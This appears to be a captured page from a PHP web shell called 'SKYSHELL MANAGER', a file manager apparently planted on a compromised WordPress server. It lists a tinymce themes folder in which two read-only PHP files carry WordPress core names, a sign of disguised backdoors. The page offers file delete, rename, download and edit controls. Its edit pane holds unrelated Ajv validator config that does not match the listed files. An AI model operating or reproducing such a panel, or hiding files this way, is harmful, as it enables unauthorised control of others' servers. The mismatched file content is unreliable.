📁
SKYSHELL MANAGER
PHP v8.3.6
Create
Create
Path:
root
/
var
/
www
/
cstage
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
ms-files.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-activate.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: ajv.js
/** * @fileoverview The instance of Ajv validator. * @author Evgeny Poberezkin */ "use strict"; //------------------------------------------------------------------------------ // Requirements //------------------------------------------------------------------------------ const Ajv = require("ajv"), metaSchema = require("ajv/lib/refs/json-schema-draft-06.json"); //------------------------------------------------------------------------------ // Public Interface //------------------------------------------------------------------------------ module.exports = (additionalOptions = {}) => { const ajv = new Ajv({ strict: "log", strictTuples: false, meta: false, useDefaults: true, validateSchema: false, verbose: true, schemaId: "auto", ...additionalOptions }); ajv.addMetaSchema(metaSchema); ajv.opts.defaultMeta = metaSchema.id; return ajv; };
Save